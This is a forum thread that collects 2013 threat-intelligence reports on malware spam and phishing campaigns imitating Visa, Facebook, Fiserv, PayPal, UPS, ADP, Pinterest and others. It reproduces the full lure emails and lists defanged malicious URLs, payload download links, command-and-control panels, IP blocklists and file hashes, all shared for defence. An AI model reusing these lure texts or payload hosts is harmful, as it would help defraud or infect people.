notice: this visa communication is furnished to you solely in your capacity as a customer of visa inc. (or its authorized agent) or a participant in the visa payments system. by accepting this visa communication, you acknowledge that the information contained herein (the "information") is confidential and subject to the confidentiality restrictions contained in visa's operating regulations, which limit your use of the information. you agree to keep the information confidential and not to use the information for any purpose other than in your capacity as a customer of visa inc. or a participant in the visa payments system. the information may only be disseminated within your organization on a need-to-know basis to enable your participation in the visa payments system.
please be advised that the information may constitute material nonpublic information under u.s. federal securities laws and that purchasing or selling securities of visa inc. while being aware of material nonpublic information would constitute a violation of applicable u.s. federal securities laws. this information may change from time to time. please contact your visa representative to verify current information. visa is not responsible for errors in this publication. the visa non-disclosure agreement can be obtained from your visa account manager or the nearest visa office.
this message was sent to you by visa, p.o. box 8999, san francisco, ca 94128. please click here to unsubscribe.
Despite the errors in the email it still ends up going through a -hacked- legitimate site to a Blackhole Exploit kit at [donotclick]anygus .com/news/fewer_tedious_mentioning.php (report here*) hosted on the following IPs:
193.254.231.51 (Universitatea Transilvania Brasov, Romania)
202.147.169.211 (LINKdotNET Telecom, Pakistan)
Recommended blocklist:
193.254.231.51
202.147.169.211 ..."
* http://urlquery.net/report.php?id=3262435
"... Detected BlackHole v2.0 exploit kit URL pattern ..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Product Purchase Email Messages - 2013 Jun 21
Fake Claims Invoice Email Messages - 2013 Jun 21
Fake Bill Payment Notification Email Messages - 2013 Jun 21
Fake Christmas Greeting Email Messages - 2013 Jun 21
Fake Bill Payment Request Email Messages - 2013 Jun 21
Fake Payment Notification Email Messages - 2013 Jun 21
Fake Portuguese Bank Deposit Delivery Notification Email Messages - 2013 Jun 21
Malicious Attachment Email Messages - 2013 Jun 21
Fake Xerox Scan Attachment Email Messages - 2013 Jun 21
Fake German Invoice Delivery Email Messages - 2013 Jun 21
(More detail and links at the cisco URL above.)
:fear::mad:
AplusWebMaster
2013-06-24, 19:10
FYI...
Fake Facebook SPAM / chinadollars .net
- http://blog.dynamoo.com/2013/06/facebook-spam-chinadollarsnet.html
24 June 2013 - "This fake Facebook spam leads to malware on chinadollars .net:
Date: Mon, 24 Jun 2013 09:18:12 -0500
From: Facebook [notification+SCCRJ42M8P @facebookmail .com]
Subject: You have 1 friend request ...
You have new notifications.
A lot has happened on Facebook since you last logged in. Here are some notifications you've missed from your friends.
1 friend request
View Notifications
Go to Facebook
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please unsubscribe.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303
The link in the email goes through a legitimate but -hacked- site and then leads to a malware landing page at [donotclick]chinadollars .net/news/inputted-ties.php (report here*) hosted on:
119.147.137.31 (China Telecom, China)
202.147.169.211 (LINKdotNET, Pakistan)
203.80.17.155 (MYREN Cloud Infrastructrure, Malaysia)
210.42.103.141 (Wuhan Urban Construction Institute, China)
Recommended blocklist:
119.147.137.31
202.147.169.211
203.80.17.155
210.42.103.141 ..."
* http://urlquery.net/report.php?id=3303350
___
Fake Fiserv SPAM - / SecureMessage_TBTATU41DMJDT5B.zip
- http://blog.dynamoo.com/2013/06/fiserv-secure-email-notification.html
24 June 2013 - "This fake FISERV email has a malicious attachment SecureMessage_TBTATU41DMJDT5B.zip containing a trojan named SecureMessage.exe:
Date: Mon, 24 Jun 2013 07:27:59 -0600 [09:27:59 EDT]
From: Fiserv Secure Notification [secure.notification @fiserv .com]
Subject: Fiserv Secure Email Notification - TBTATU41DMJDT5B
Part(s):
2 SecureMessage_TBTATU41DMJDT5B.zip [application/zip] 104 KB
You have received a secure message
Read your secure message by opening the attachment, SecureMessage_TBTATU41DMJDT5B.zip.
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - SUgDu07dn
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it.
To access from a mobile device, forward this message to mobile @res .fiserv .com to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.710.6198.
2000-2013 Fiserv Secure Systems, Inc. All rights reserved.
Ask yourself this question: why would you encrypt a message and then put the password in the email? Simple.. to get past virus scanners, of course! The VirusTotal detection for this malware is just 8/46*.
Other analysis is pending, the malware has the following checksums:
Size 117248
MD5 fdd154360854e2d9fee47a557b296519
SHA1 d3de7f5514944807eadb641353ac9380f0c64607
SHA256 1ef3302196f5c4cd9bf97c719e934d612a244a17a20f5a742c15d8203d477f59
* https://www.virustotal.com/en/file/1ef3302196f5c4cd9bf97c719e934d612a244a17a20f5a742c15d8203d477f59/analysis/1372086208/
File name: SecureMessage.exe
Detection ratio: 8/46
Analysis date: 2013-06-24
- http://threattrack.tumblr.com/post/53757242508/fiserv-securemessage-attachment-spam
24 June 2013 - "Subjects Seen:
Please respond - overdue payment
Typical e-mail details:
You have received a secure message ...
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/201bb68bb4cc6d3d10a9fae75dc69b39/tumblr_inline_mowhsjzZ5Q1qz4rgp.png
___
PayPal Credentials Phish
- http://threattrack.tumblr.com/post/53756074278/paypal-credentials-phish
24 June 2013 - "Subjects Seen:
Important Message
Typical e-mail details:
Dear PayPal Manager Customer,
We regret to inform you that your merchant account has been locked.
Te re-activate it please download the file attached to this e-mail and update your login information.
Malicious URLs
bellt .es/CSS/confirm.php
Malicious File Name and MD5:
vtextloginpage.html (06c12f594dc7a558510cb9d9c402ed8f)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e01a5689879039aff7cde4b5370185df/tumblr_inline_mowgmc7E4u1qz4rgp.png
___
Rogue ‘Free Mozilla Firefox Download’ ads lead to ‘InstallCore’ PUA...
- http://blog.webroot.com/2013/06/24/rogue-free-mozilla-firefox-download-ads-lead-to-installcore-potentially-unwanted-application-pua/
June 24, 2013 - "Our sensors continue detecting rogue ads that expose users to bogus propositions in an attempt to install privacy-invading Potentially Unwanted Applications (PUAs) on their PCs. The most recent campaign consists of a successful brand-jacking abuse of Mozilla’s Firefox browser, supposedly offered for free, while in reality, the rogue download manager entices users into installing multiple rogue toolbars, most commonly known as InstallCore...
Sample screenshot of the landing page:
> https://webrootblog.files.wordpress.com/2013/06/rogue_bogus_fake_ads_free_download_mozilla_firefox_installcore_pua_potentially_unwanted_application_ezdownload.png?w=609&h=567
Rogue download URL:
hxxp ://www.ez-download .com/mozilla-firefox
Detection rate for the Potentially Unwanted Application (PUA) – MD5: * ... Win32/InstallCore.BL; InstallCore (fs).
The rogue sample is digitally signed by ‘Secure Installer’.
Once executed, it phones back to:
media.ez-download .com – 54.230.12.193
os.downloadster2cdn .com – 54.245.235.34
cdn.secureinstaller .com – 54.230.12.162
img.downloadster2cdn .com – 199.58.87.151 ...
We advise users to avoid interacting with ads enticing them into downloading well known software applications, and to always visit their official Web sites in order to obtain the latest versions..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/eb06f4146a8e798d979aa8f6a11bd850705d31c52d7cb04a0229579c586034b9/analysis/
File name: Firefox_Setup_21.0.exe
Detection ratio: 4/47
Analysis date: 2013-06-21
:fear::fear: :mad:
AplusWebMaster
2013-06-25, 22:01
FYI...
Fake Southwest Airlines SPAM / meynerlandislaw .net
- http://blog.dynamoo.com/2013/06/southwest-airlines-confirmation-kqr101.html
25 June 2013 - "This fake Southwest Airlines spam leads to malware on meynerlandislaw .net:
from: Southwest Airlines [information @luv.southwest .com]
reply-to: Southwest Airlines [no-reply@ emalsrv.southwestmail .com]
date: 25 June 2013 17:09
subject: Southwest Airlines Confirmation: KQR101
[redacted] 2013-06-25 JACEE3 INITIAL SLC WN PHX0.00T/TFF 0.00 END AY2.50$SLC1.50 1583018870396 2013-12-22 1394 2013-06-26 Depart SALT LAKE CITY IL (SLC) at 10:14 PM on Southwest Airlines Arrive in PAOLO ALTO MI (PHX) at 1:30 PM
You're all set for your travel!
Southwest Airlines
My Account | Review My Itinerary Online ...
The link goes through a legimate -hacked- site and end up on a malicious payload at [donotclick]meynerlandislaw .net/news/possibility-redundant.php (report here*) hosted on the following IPs:
119.147.137.31 (China Telecom, China)
203.80.17.155 (MYREN, Malaysia)
Recommended blocklist:
119.147.137.31
203.80.17.155 ..."
* http://urlquery.net/report.php?id=3323617
... Detected BlackHole v2.0 exploit kit URL pattern..."
___
Something evil on 173.246.104.154
- http://blog.dynamoo.com/2013/06/something-evil-on-173246104154.html
24 June 2013 - "173.246.104.154 (Gandi, US) is hosting hacked GoDaddy domains serving a variety of malware [1] [2]..."
1] http://urlquery.net/search.php?q=173.246.104.154&type=string&start=2013-06-09&end=2013-06-24&max=50
2] https://www.virustotal.com/en/ip-address/173.246.104.154/information/
Diagnostic page for AS29169 (GANDI)
- https://www.google.com/safebrowsing/diagnostic?site=AS:29169
"... over the past 90 days, 318 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-06-25, and the last time suspicious content was found was on 2013-06-25... Over the past 90 days, we found 24 site(s) on this network... that appeared to function as intermediaries for the infection of 103 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 153 site(s)... that infected 843 other site(s)..."
___
FedEx Delivery Notification Spam
- http://threattrack.tumblr.com/post/53862085299/fedex-delivery-notification-spam
June 25, 2013 - "Subjects Seen:
Delivery Notification
Delivery Notification ID#<random>
Typical e-mail details:
Dear Client,
Your parcel has arrived at June 13. Courier was unable to deliver the parcel to you.
To receive your parcel, print this label and go to the nearest office.
Malicious URLs
txwebsolutions .com/main.php?d_info=899_549892719
ehagency .com/main.php?g_info=ss00_323
eup-ecodesign .com/main.php?g_info=ss00_323
roccoracingmotors .com/main.php?g_info=ss00_323
bebmorena .com/main.php?g_info=ss00_323
metrocomoptimist .org/img/info.php?g_info=ss00_323
Malicious File Name and MD5:
Shipment_Label.zip (a95ef37d4d992ac63cbb81e116Ca6d07)
Shipment_Label.exe (fcd9314b644d86eee71cd67c44935fc8)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/89cec4c8475090ef7c9f7c1d6208cdd2/tumblr_inline_moyqvtdowG1qz4rgp.png
___
Fake ADP SPAM / spanishafair .com
- http://blog.dynamoo.com/2013/06/adp-spam-spanishafaircom.html
25 June 2013 - "This fake ADP spam leads to malware on spanishafair .com:
Date: Tue, 25 Jun 2013 14:38:05 +0000 [10:38:05 EDT]
From: Run Do Not Reply [RunDoNotReply @ipn.adp .net]
Subject: Your Biweekly payroll is accepted
Yoyr payroll for check date 06/25/2013 is approved. Your payroll would be done at least 3 days before to your check date to ensure timely tax deposits and payroll delivery. If you offer direct deposit to your employees, this will also support pay down their money by the due date.
Client ID: [redacted]
View Details: Review
Important: Please be advised that calls to and from your payroll service team may be monitored or recorded.
Please do not reply to this message. auto informer system not configured to accept incoming messages.
The malicious payload is at [donotclick]spanishafair .com/news/possibility-redundant.php hosted on:
119.147.137.31 (China Telecom, China)
210.42.103.141 (Wuhan Urban Construction Institute, China)
203.80.17.155 (MYREN Cloud Infrastructrure, Malaysia)
Related evil domains and IP addresses to block can be found here* and here**."
* http://blog.dynamoo.com/2013/06/facebook-spam-chinadollarsnet.html
** http://blog.dynamoo.com/2013/06/southwest-airlines-confirmation-kqr101.html
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bill Payment Notification Email Messages - 2013 Jun 25
Malicious Personal Pictures Attachment Email Messages - 2013 Jun 25
Fake Bank Deposit Confirmation Email Messages - 2013 Jun 25
Fake Legal Contract Form Email Messages - 2013 Jun 25
Fake Customer Complaint Attachment Email Messages - 2013 Jun 25
Fake Mobile Phone Credit Notification Email Messages - 2013 Jun 25
Fake Unpaid Debt Invoice Email Messages - 2013 Jun 25
Email Messages with Malicious Attachments - 2013 Jun 25
Fake Sample Product Purchase Order Email Messages - 2013 Jun 25
Fake Bank Payment Transfer Notification Email Messages - 2013 Jun 25
Fake Personal Photo Sharing Email Messages - 2013 Jun 25
Fake Product Order Inquiry Email Messages - 2013 Jun 25
Fake Authorization Letter Email Messages - 2013 Jun 25
(More detail and links at the cisco URL above.)
:fear: :mad:
AplusWebMaster
2013-06-26, 18:54
FYI...
Fake UPS Parcel Pickup Spam
- http://threattrack.tumblr.com/post/53933973553/ups-parcel-pickup-spam
June 26, 2013 - "Subjects Seen:
UPS - Your package is available for pickup ( Parcel <random> )
Typical e-mail details:
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.
Malicious URLs
nichebiznetwork .com/ponyb/gate.php
watertreecapital .com/ponyb/gate.php
attentivetodetails .com/ponyb/gate.php
furnishedfloorplans .com/ponyb/gate.php
casailtiglio .com/NY19N.exe
casevacanzeversilia .com/9jW.exe
72.52.164.246 /FDKwgvdt.exe
scenografiesacs .com/mvNaxR.exe
Malicious File Name and MD5:
Label_<random>.zip (d17aab950060319ea41b038638375268)
Label_<random>.exe (347cbf0c41a978e601b00d39928506aa)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/95660a8b8332d1fc9aa731df40ef7fd3/tumblr_inline_mp0b2emZ7e1qz4rgp.png
___
Xerox WorkCentre Scan Spam
- http://threattrack.tumblr.com/post/53943191167/xerox-workcentre-scan-spam
June 26, 2013 - "Subjects Seen:
Scanned Image from a Xerox WorkCentre
Typical e-mail details:
Tlease open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro.
Sent by: [removed]
Number of Images: 5
Attachment File Type: ZIP [PDF]
WorkCentre Pro Location: Machine location not set
Device Name: [removed]
Attached file is scanned image in PDF format.
Malicious URLs
attentivetodetails .com/ponyb/gate.php
watertreecapital .com/ponyb/gate.php
helisovertidewater .com/ponyb/gate.php
mcqbuildersllc-1 .com/ponyb/gate.php
casailtiglio .com/NY19N.exe
ftp(DOT)vickibettger .com/oEoASW64.exe
72.52.164.246 /FDKwgvdt.exe
scenografiesacs .com/mvNaxR.exe
Malicious File Name and MD5:
Scan_<random>.zip (d8d8bf4a0890c937d501b78cdfd7de13)
Scan_<random>.exe (40378c0d43dd8c135f90a704911024bd)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0a63c5f2e3e8fe5357c7f93c60ffa848/tumblr_inline_mp0hcwPh591qz4rgp.png
:mad: :fear:
AplusWebMaster
2013-06-27, 18:57
FYI...
BBB Compliant Spam
- http://threattrack.tumblr.com/post/54017972956/better-business-bureau-compliant-spam
June 27, 2013 - "Subjects Seen:
FW: Complaint Case <removed>
Typical e-mail details:
The Better Business Bureau has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position.
As a neutral third party, the Better Business Bureau can help to resolve the matter. Often complaints are a result of misunderstandings a company wants to know about and correct.
In the interest of time and good customer relations, please provide the BBB with written verification of your position in this matter by June 30, 2013. Your prompt response will allow BBB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter.
The Better Business Bureau develops and maintains Reliability Reports on companies across the United States and Canada . This information is available to the public and is frequently used by potential customers. Your cooperation in responding to this complaint becomes a permanent part of your file with the Better Business Bureau. Failure to promptly give attention to this matter may be reflected in the report we give to consumers about your company.
We encourage you to print this complaint (attached file), answer the questions and respond to us.
We look forward to your prompt attention to this matter.
Sincerely,
BBB Serving Metropolitan New York, Long Island and the Mid-Hudson Region
Malicious URLs
ammscanada .com/ponyb/gate.php
ammschicago .com/ponyb/gate.php
ammsdallas .com/ponyb/gate.php
ammsdirectors .com/ponyb/gate.php
casailtiglio .com/NY19N.exe
ftp(DOT)vickibettger .com/oEoASW64.exe
72.52.164.246 /FDKwgvdt.exe
scenografiesacs .com/mvNaxR.exe
Malicious File Name and MD5:
Case_<random>.zip (0ed9dd827d557d3e20818ab50c7d930b)
Case_<random>.exe (f317d215a672a209cbdcba452e5e84d8)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/864f030c0de853f3b6a5ca065a105f5e/tumblr_inline_mp24td7SVn1qz4rgp.png
__
Fake OfficeWorld .com SPAM / sartorilaw .net
- http://blog.dynamoo.com/2013/06/officeworldcom-spam-sartorilawnet.html
27 June 2013 - "This fake OfficeWorld spam leads to malware on sartorilaw .net:
Date: Thu, 27 Jun 2013 12:39:36 -0430 [13:09:36 EDT]
From: customerservice @emalsrv.officeworldmail .net
Subject: Confirmation notification for order 1265953
Thank you for choosing OfficeWorld.com - the world's biggest selection of business products!
Please review your order details below. If you have any questions, please Contact Us
Helpful Tips:
- Please SAVE or PRINT this confirmation for your records.
- ORDER STATUS is available online! Login and click "My Orders" to obtain UPS tracking information, etc.
- If you skipped registration, or forgot your password, simply enter your Login ID (normally your full e-mail address) and click [ forgot password ] to access your account.
Order: 1265953
Date: 6/27/2013
Ship To: My Default
Credit Card: MasterCard
Product Qty Price Unit Extended
HEWCC392A 1 $9703.09 EA $15.15
AVE5366 1 $27.49 BX $27.49
SAF3081 2 $56.29 EA $112.58
Product Total: $9855.22
Total: $9855.22
OfficeWorld.com values your business!
The link in the email goes through a legitimate -hacked- site and then on to [donotclick]sartorilaw .net/news/source_fishs.php (report here*) hosted on the following IPs:
77.240.118.69 (Acens Technologies, Spain)
78.108.86.169 (Majordomo LLC, Russia)
89.248.161.148 (Ecatel, Netherlands)
108.177.140.2 (Nobis Technology Group, US)
Recommended blocklist:
77.240.118.69
78.108.86.169
89.248.161.148
108.177.140.2 ..."
* http://urlquery.net/report.php?id=3362472
... Detected BlackHole v2.0 exploit kit URL pattern...
:mad: :fear:
AplusWebMaster
2013-06-28, 16:33
FYI...
Fake Fox News-themed malicious email campaign
- http://community.websense.com/blogs/securitylabs/archive/2013/06/28/fox-news-themed-malicious-email-campaign.aspx
28 Jun 2013 - "Websense... discovered an interesting malicious email campaign using spoofed email addresses from Fox News domains in an attempt to ultimately lure victims to websites hosting the Blackhole Exploit Kit. Should the exploit and compromise be successful, a malicious payload related to the Cridex family appears to be delivered which, as detailed in an earlier Websense Security Labs blog, is typically used to steal banking credentials as well as the exfiltration of personally identifiable information (PII) and other confidential data for criminal gain. These emails, discovered early on the morning of June 27th, featured “breaking news” subjects and mimicked legitimate news content related to the US Military moving into Syria in order to entice the victim to 'click' on the malicious links. The campaign appears to have targeted a variety of industries and countries, as of 1600 PST on June 27th, the Websense ThreatSeeker® Intelligence Cloud had detected and blocked over 60,000 samples.
... Screenshot:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/8360.1.png_2D00_550x0.png
Intercepted emails generated interest as they are highly convincing as breaking news alerts and are targeting highly popular and polarizing topics such as Immigration reform, the war on terror, and sending troops to Syria. Example email subjects include:
- U.S. Military Action in Syria - is it WW3 start?
- US deploys 19,000 troops in Syria
- Obama Sending US Forces to Syria
Malicious Email Analysis: The emails above contain links that follow a series of redirections leading to a BlackHole exploit kit which delivers a malicious PDF. Once opened, the malicious PDF executes embedded and obfuscated JavaScript code which delivers an exploit (CVE-2010-0188). In the event the exploit is successful, the shellcode downloads a malicious component from: hxxp ://sartorilaw .net/news/source_fishs.php?kxdtlz=1l:1g:1i:1o:1j&mbtdi=1k:33:1f:32:2w:30:1h:1o:1h:1g&swlpwu=1i&doko=vaif&wgnrppva=xoti
The malicious component downloaded by the shell-code is characterized as a Trojan that is capable of downloading malicious files onto a compromised computer and spreading itself via mapped and removable drives.
Malicious component:
https://www.virustotal.com/en/file/2b6a58cbf235fedfbcdb1f15645f5d3f9156ebeb916074539b83c1e7934b1ef9/analysis/
About the PDF file:
https://www.virustotal.com/en/file/f2130f5c0e388454db7c8b25d16b59cb19ba193fe6cd1a5a7b7168d94e6d243b/analysis/
... Once executed, a number of HTTP connections on port 8080 are opened in order to download additional malicious payloads..."
(More detail available at the websense URL above.)
___
Fake jConnect SPAM / FAX_281_3927981981_283.zip
- http://blog.dynamoo.com/2013/06/jconnect-spam-fax2813927981981283zip.html
28 June 2013 - "This fake fax spam is meant to contain malware, but in this particular case is being sent out with a corrupt attachment:
Date: Fri, 28 Jun 2013 09:41:52 -0500 [10:41:52 EDT]
From: jConnect [message @inbound .j2 .com]
Subject: jConnect fax from "697-377-6967" - 28 page(s), Caller-ID: 697-377-6967
Fax Message[Caller-ID: 697-377-6967] You have received a 28 page(s) fax at 2012-12-17
02:13:41 EST.* The reference number for this fax is
lax3_did10-1019412300-0003832668-11.This message can be opened using your PDF reader. If
you have not already installed j2 Messenger, download it for
free:http ://www.j2 .com/downloadsPlease visit http ://www.j2 .com/help if you have any
questions regarding this message or your j2 service.Thank you for using jConnect!Home
Contact Login2011 j2 Global Communications, Inc. All rights reserved.jConnect is a
registered trademark of j2 Global Communications, Inc.This account is subject to the
terms listed in thejConnect Customer Agreement.
Both the email and the attachment are horribly mangled, and in this case don't contain their malicious payload (as with this spam run*). But be careful if receiving an email of this type as the next time the spammers try it, it may well be more dangerous."
* http://blog.dynamoo.com/2013/06/lexisnexis-spam-fail.html
___
- http://threattrack.tumblr.com/post/54102642094/jconnect-fax-spam
June 28, 2013 - "Subjects Seen:
jConnect fax from "[removed]" - 26 page(s), Caller-ID: [removed]
Typical e-mail details:
You have received a 26 page(s) fax at 2012-12-17 05:25:42 EST.
* The reference number for this fax is [removed].
This message can be opened using your PDF reader. If you have not already installed j2 Messenger, download it for free: j2 .com/downloads
Please visit j2 .com/help if you have any questions regarding this message or your j2 service.
Thank you for using jConnect!
Malicious URLs
ammsseattle .com/ponyb/gate.php
ammsstlouis .com/ponyb/gate.php
ammstestimonials .com/ponyb/gate.php
common.karsak .com .tr/FzPfH6.exe
ftp(DOT)vickibettger .com/oEoASW64.exe
printex-gmbh .de/kbo.exe
sraclinic.netarama .com/2aeDdDTW.exe
Malicious File Name and MD5:
Fax_<random>.zip (05c33cfcf22c5736c4a162f6d7c2eeac)
Fax_<random>.exe (f9a80dbb13546e235617f5b21d64cad8)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ddcd54466f73c81dcfb90ab3830659ac/tumblr_inline_mp3zr5rL5Z1qz4rgp.png
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Faxed Document Delivery Email Message - 2013 Jun 28
Fake Product Availability Request Email Messages - 2013 Jun 28
Fake Banking News Report Email Messages - 2013 Jun 28
Fake Purchase Order Invoice Email Messages - 2013 Jun 28
Fake Photo Sharing Email Messages - 2013 Jun 28
Fake Bank Deposit Confirmation Notice Email Messages - 2013 Jun 28
Fake Portuguese Photo Sharing link Email Messages - 2013 Jun 28
Fake Confidential Business Request Email Messages - 2013 Jun 28
Fake Product Purchase Order Request Email Messages - 2013 Jun 28
Fake Scanned Document Attachment Email Messages - 2013 Jun 28
Fake CashPro Online Digital Certificate Notification Email Messages - 2013 Jun 28
(More detail and links at the cisco URL above.)
:fear::fear: :mad:
AplusWebMaster
2013-06-30, 00:21
FYI...
Instagram "Fruit" SPAM
- https://isc.sans.edu/diary.html?storyid=16087
Last Updated: 2013-06-29 20:28:25 UTC - "Currently, Instagram appears to be -flooded- with images of various fruits, pointing to a site that advertises a "miracle fruit diet". The spam attack links to a fake BBC page, typically via a bit.ly link. The "BBC" page features an article touting the power of the advertised diet scheme. It appears that compromised Instagram accounts are the source of the spam. The accounts were compromised using -phishing- e-mails as some reports indicate. In addition to posting the images, the users profile URL is also changed to the spam website."
:fear: :mad:
AplusWebMaster
2013-07-01, 14:52
FYI...
Adware sites to block - 1 July 2013
- http://blog.dynamoo.com/2013/07/adware-sites-to-block-1713.html
1 July 2013 - "Never trust any sort of ad network that uses anonymous domains and hides all other identifying data. These seem to be doing to rounds at the moment, some of them may be involved in injection attacks or adware installs...
cdnsrv .com
tracksrv .com
cdnloader .com
secure-content-delivery .com
mydatasrv .com
Domains all seem to be on parking IPs or Amazon AWS, so difficult to block by IP address."
___
Email credentials - Phish
- http://threattrack.tumblr.com/post/54341109175/email-credentials-phish
July 1, 2013 - "Subjects Seen:
Email Deactivation Notice
Typical e-mail details:
An automatic security update has been carried out on your Email Account.
Click here to Login and complete update
Please note that you have within 24 hours to complete this update, because you might lose access to your Email Account
Malicious URLs
190.6.206.173 /~radioxge/updated/index.html
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d20e774e38626d820e2cb9c6c13f3fdf/tumblr_inline_mp9ex0Pz3B1qz4rgp.png
___
Fake Pinterest SPAM / pinterest .com.reports0701.net
- http://blog.dynamoo.com/2013/07/pinterest-spam-pinterestcomreports0701n.html
1 July 2013 - "This fake Pinterest spam leads to malware on pinterest .com.reports0701.net:
Date: Mon, 1 Jul 2013 21:04:36 +0530
From: "Pinterest" [naughtinessw5 @newsletters .pinterest .net]
To: [redacted]
Subject: Your password on Pinterest Successfully changed!
[redacted]
Yor password was reset. Request New Password.
See Password
Pinterest is a tool for collecting and organizing things you love.
This email was sent to [redacted].
Don?t want activity notifications? Change your email preferences.
�2013 Pinterest, Inc. | All Rights Reserved
Privacy Policy | Terms and Conditions
The link goes through a legitimate -hacked- site to end up on a malicious payload at [donotclick]pinterest .com.reports0701.net/news/pay-notices.php (report here* and here**) which contains an exploit kit. The malware is hosted on a subdomain of a main domain with fake WHOIS details (it belongs to the Amerika gang) which is a slightly new technique:
June Parker parker @mail .com
740-456-7887 fax: 740-456-7844
4427 Irving Road
New Boston OH 45663
us
The following IPs are in use:
77.240.118.69 (Acens Technlogoies, Spain)
89.248.161.148 (Ecatel, Netherland)
208.81.165.252 (Gamewave Hongkong Holdings, US)
Recommended blocklist:
77.240.118.69
89.248.161.148
208.81.165.252 ..."
* http://urlquery.net/report.php?id=3454469
** http://urlquery.net/report.php?id=3454450
:sad: :fear:
AplusWebMaster
2013-07-02, 15:24
FYI...
Adware sites to block 2/7/13
- http://blog.dynamoo.com/2013/07/adware-sites-to-block-2713.html
2 July 2013 - "Never trust an ad network that uses anonymous WHOIS details. These are hosted on 108.161.189.161 (NetDNA, US) and all hide their details... Given the amount of adware* on this server, I would recommend blocking it... "
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en/ip-address/108.161.189.161/information/
___
Malware sites to block 2/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-2713.html
2 July 2013 - "These sites belong to this gang* and house exploit kits and other nastiness. I've broken the list down into three sections: IPs and web hosts, plain IPs (for copy and pasting) and malware domains. The domains change on a regular basis, the IPs less frequently and are therefore probably the best things to block..."
(Long lists at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Babylon and the 3954 Trojans...
- http://blog.dynamoo.com/2013/07/babylon-and-3954-trojans-or-whore-of.html
2 July 2013 - ""Babylon and the 3954 Trojans" sounds like a swords and sandals epic, but unfortunately it's just another example of crapware gone wild... At the heart of Babylon.com's business is a marginally useful "free" translation application plus some paid add-ons... and installs a load of crapware onto your computer when it does so... system administrators keep finding the product installed on their machines, adware and all. This piece of software even has its own Wikipedia entry* covering malware issues. Do you really want your users to go anywhere near this site? As far as I can tell, at the moment the Babylon software is downloaded from the following IPs which you may want to -block- (all operated by Singlehop):
69.175.87.109
81.93.185.144
81.93.185.145
173.236.48.139
173.236.91.147
184.154.40.59
184.154.151.19
198.143.175.67
216.104.42.91 ..."
(More detail at the dynamoo URL above.)
* http://en.wikipedia.org/wiki/Babylon_%28software%29#Malware_issues
> https://www.virustotal.com/en/domain/babylon.com/information/
Diagnostic page for AS32475 (SINGLEHOP)
- https://www.google.com/safebrowsing/diagnostic?site=AS:32475
- https://www.google.com/safebrowsing/diagnostic?site=babylon.com
"... Malicious software includes 3954 trojan(s)..."
___
DHL Shipment Notification Spam
- http://threattrack.tumblr.com/post/54451871009/dhl-shipment-notification-spam
July 2, 2013 - "Subjects Seen:
Delivery Status Notification ID#[removed]
Typical e-mail details:
DHL Ship Shipment Notification
On June 23, 2013 a shipment label was printed for delivery.
The shipment number of this package is [removed].
To get additional info about this shipment use any of these options:
1) Click the following URL in your browser:
Get Shipment Info
2) Enter the shipment number on tracking page:
Tracking Page
For further assistance, please call DHL Customer Service.
For International Customer Service, please use official DHL site.
Malicious URLs
ah-nanas .se/main.php?inf=ss00_323
unitedcricketclub .co.za/main.php?inf=ss00_323
dsfstore .ro/main.php?inf=ss00_323
Malicious File Name and MD5:
Delivery_Information.zip (6ea731d13579040c20208dfbc7bddb0f)
Delivery_Information_ID-<random>.exe (560f37022593bf13c4071f4c5dc3b48c)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0085675aa612ec546f18835d5fe59d37/tumblr_inline_mpbrq1AKhv1qz4rgp.png
:mad::fear:
AplusWebMaster
2013-07-03, 22:55
FYI...
Blackhole Exploit Kit SPAM campaign hits Pinterest
- http://blog.trendmicro.com/trendlabs-security-intelligence/blackhole-exploit-kit-spam-campaign-hits-pinterest/
July 3, 2013 - "... we are now seeing a BHEK spam campaign targeting social networking website -Pinterest- and its users. Prior to this campaign, the website has also been the target of other threats, such as survey scams and spammed mails that lead to malicious websites.
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/07/pinterestbhek.jpg
We received a sample of the messages being spammed, and upon analysis, discovered how its infection chain goes. Here is the entire infection chain, as follows:
• The user receives the spammed mail in his inbox. It is tailored to resemble a legitimate mail from Pinterest, and notifies the user about a successful password change. It also presents a link that would allow him to see his new password.
• Should the user click on the link, he is put through a series of website redirects. This redirection is detected as HTML_IFRAME.USR.
